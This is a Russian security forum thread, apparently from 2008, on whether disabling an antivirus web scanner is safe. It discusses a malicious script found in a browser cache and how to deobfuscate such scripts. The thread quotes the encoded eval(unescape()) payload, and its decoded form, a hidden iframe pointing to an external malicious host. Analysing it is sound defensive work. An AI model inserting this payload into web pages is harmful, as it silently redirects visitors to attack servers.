-
Антивирус без веб сканера - безапосно-ли?
Вопрос вот в чем: если отключить проверку http в антивирусе, то насколько это будет не безопасней чем с включенным http сканером? Авира тормозит сказку с инета файлов, Bitdefender тормозит загрузку некоторых страничек, Аваст конфликтует с Ad Muncher. Вобщем ваше мнение
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Сообщение от
senyak
Вопрос вот в чем: если отключить проверку http в антивирусе, то насколько это будет не безопасней чем с включенным http сканером? Авира тормозит сказку с инета файлов, Bitdefender тормозит загрузку некоторых страничек, Аваст конфликтует с Ad Muncher. Вобщем ваше мнение
Веб антивирус отвечает за проверку файлов которые вы скачиваете. А также он проверяет скрипты. Если вы проверяете все файла после скачивания или файловый антивирус включен + скрипты отключены (или используется что-либо типа NoScript) то можно отключать.
-
-
Сообщение от
zerocorporated
Веб антивирус отвечает за проверку файлов которые вы скачиваете. А также он проверяет скрипты. Если вы проверяете все файла после скачивания или файловый антивирус включен + скрипты отключены (или используется что-либо типа NoScript) то можно отключать.
Не совсем так - WEB страничка может содержать эксплоит (и совсем не обязательно в виде скрипта). Если этот эксплоит будет пойман WEB антивирусом, то он не дойдет до браузера и не сработает, что усиливает защиту в целом.
-
-
Этот вирус должен где-то сохранится (может кэш браузера) и потом только действовать? У меня Опера. Раньше Доктор Веб часто ловил в кэше вирусов
-
-
Сообщение от
Зайцев Олег
Не совсем так - WEB страничка может содержать эксплоит (и совсем не обязательно в виде скрипта). Если этот эксплоит будет пойман WEB антивирусом, то он не дойдет до браузера и не сработает, что усиливает защиту в целом.
Ну... если дальше идти то теоретически эксплоиты и в изображении могут содержатся, FLASH анимации и т.д.
Сообщение от
senyak
Этот вирус должен где-то сохранится (может кэш браузера) и потом только действовать? У меня Опера. Раньше Доктор Веб часто ловил в кэше вирусов
Нет. Браузер загружает страницу и парсит её, то есть разбирает и выполняет то что в ней написано(HTML код, скрипты).
http://ru.wikipedia.org/wiki/Кэш
-
-
Вот сейчас живой пример. Установлен KIS 7.0, с включённым веб-антивирусом, при просмотре странички w.w.ssclg.com/epson.shtml, в кэш браузера попадает файл opr01LDH.shtml, который антивирус сразу распознаёт как http://www.virustotal.com/analisis/c...457b05507563bf
в конце файла вот такой скрипт, я думаю он всему виной, для чего этот скрипт? И как этот файл может нанести вред компьютеру пользователя?
</div>
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6 d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61% 6d%65%20%6e%61%6d%65%3d%38%35%62%20%73%72%63%3d%5c %27%68%74%74%70%3a%2f%2f%61%77%61%73%2e%63%64%2f%7 4%64%73%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74% 3d%31%31%39%33%37%37%32%31%35%30&%27%2b%4d%61%74%6 8%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64% 6f%6d%28%29%2a%32%34%30%35%33%34%29%2b%27%37%63%66 %38%64%37%36%36%39%37%61%61%5c%27%20%77%69%64%74%6 8%3d%34%38%33%20%68%65%69%67%68%74%3d%34%39%38%20% 73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20 %6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%2 7%29")); </script>
</BODY>
</HTML>
Последний раз редактировалось ISO; 07.05.2008 в 21:31.
Я не волшебник, а только учусь.
-
-
Сообщение от
Ромео
в конце файла вот такой скрипт, я думаю он всему виной, для чего этот скрипт? И как этот файл может нанести вред компьютеру пользователя?
Раскодированный вариант скрипта выглядит так:
Код:
<script>eval(unescape("window.st atus='Done';docu?dent.write('<ifra?de name=85b src=\ 'http://awas.cd/?4ds/index.php?out?d1193772150&'+Mat?8.round(Math.rand?fm()*240534)+'7cf 8d76697aa\' widt?8=483 height=498 ?3tyle=\'display: none\'></iframe>?7)")); </script>
Тут виден iframe который скрытно должен выполнить страницу с сайта awas.cd
Скрытно это предположение: display: none - на подозрение наводит.
-
-
Сообщение от
zerocorporated
Раскодированный вариант скрипта выглядит так:
Код:
<script>eval(unescape("window.st atus='Done';docu?dent.write('<ifra?de name=85b src=\ 'http://awas.cd/?4ds/index.php?out?d1193772150&'+Mat?8.round(Math.rand?fm()*240534)+'7cf 8d76697aa\' widt?8=483 height=498 ?3tyle=\'display: none\'></iframe>?7)")); </script>
Раскодированный скрипт:
Код:
<iframe name=85b src='http://awas.cd/tds/index.php?out=1193772150&1552277cf8d76697aa' width=483 height=498 style='display: none'></iframe>
-
-
Тоесть это конечно снижает общую безопасность ПК, но если отключить скрипт, то это повышает безопасность ПК? А где можно глянуть подробно о этих скриптах и как отключить?
Ромео - тоесть он попал в кэш, откуда и прихлопнул его Каспер?
Последний раз редактировалось senyak; 07.05.2008 в 22:52.
-
-
Сообщение от
senyak
Тоесть это конечно снижает общую безопасность ПК, но если отключить скрипт, то это повышает безопасность ПК? А где можно глянуть подробно о этих скриптах и как отключить?
Нужно разрешать выполнения скриптов только доверенным сайтам - например, на форум часто используются они. Безопасность улучшится потому что "гуляя" по страницам и нарвавшись на вредоносный java скрипт он просто не исполнится. Отметить ещё охота, что примерно при 90% заражений применяется java скрипт.
Про отключение можете почитать в этой книге.
-
-
Сообщение от
senyak
Ромео - тоесть он попал в кэш, откуда и прихлопнул его Каспер?
Именно так, обнаружил его Каспер в кэше браузера Opera, но прихлопывать ему я не разрешил, вначале исследовал файл на вирустотал, а потом только прихлопнул .
Добавлено через 4 минуты
Сообщение от
Muffler
Раскодированный скрипт:
Код:
<iframe name=85b src='http://awas.cd/tds/index.php?out=1193772150&1552277cf8d76697aa' width=483 height=498 style='display: none'></iframe>
А чем можно скрипты раскодировать?
Последний раз редактировалось ISO; 08.05.2008 в 07:46.
Причина: Добавлено
Я не волшебник, а только учусь.
-
-
Сообщение от
Ромео
А чем можно скрипты раскодировать?
Руками - самое универсально средство ... Ключ к раскодировке в том, что скрипт то сам себя как-то должен раскодировать перед запуском - следовательно, код дешифрации у него есть. Правда пападаются экспонаты с 3-4 уровнями шифровки, вложенными друг в друга.
-
-
ну незнаю, я лично вэб нюхач не использую, т.к. скорость серфинга замедляется
но если бы использовал IE - поставил бы в любом случае.
-
Junior Member
- Вес репутации
- 60
Я всегда использую все сканеры антивира,так как на новых сайтах,элементарно можно нарваться на вредоносный скрипт.Правда, по моему опыту,обычно,в кэше веб-браузера сидят все вредоносные файлы/скрипты.И я всегда ставлю,В настройках IE очищать кэш при выходе из программы.
-
Сообщение от
Зайцев Олег
Руками - самое универсально средство ... Ключ к раскодировке в том, что скрипт то сам себя как-то должен раскодировать перед запуском - следовательно, код дешифрации у него есть. Правда пападаются экспонаты с 3-4 уровнями шифровки, вложенными друг в друга.
А где-нибудь про это можно почитать, так сказать получить первоначальные сведения о раскодировке скриптов?
Я не волшебник, а только учусь.
-
-
-гугл знает...
С уважением,
Alex Plutoff
А. ПЛАТОВ
-
-
Сообщение от
Ромео
А где-нибудь про это можно почитать, так сказать получить первоначальные сведения о раскодировке скриптов?
Кроме гугла и яндекса можно взять любую книжку по основам Java-Script и VBS. Все известные мне криптеры и обфускаторы весьма простые - криптовка как правило идет на уровне строковых операций и простейшей арифметики, а обфускация достигается вставкой кучи переводов строки, незначащих бредовых комментариев, переименования имен переменных, перестановке команд и добавления бредокода (типа декларации ненужных переменных или распиливания текстовой строки на неколько кусков с последующей конкантенацией ...). Возможные сложности - это вложенные криптеры (т.е. приходится делать несколько итераций раскриптовки) и настырные обфускаторы (например, вставляющий тысячи переводов строки и бредо-комментариев, что делает текст нечитаемым - приходится писать небольшую программу для очистки кода). Подобную утилиту для очистки кода несложно сделать на любом языке программирования, причем можно сделать универсальную, а можно (и проще) - под конкретный случай. Кроме того, есть различные редакторы с автоформатирование кода - они могут помочь в случае, если в качестве снижения читаемости зловредный скрипт сделан без форматирования (как правила все команды скрипта в одну строку)
Последний раз редактировалось Зайцев Олег; 12.05.2008 в 10:18.
-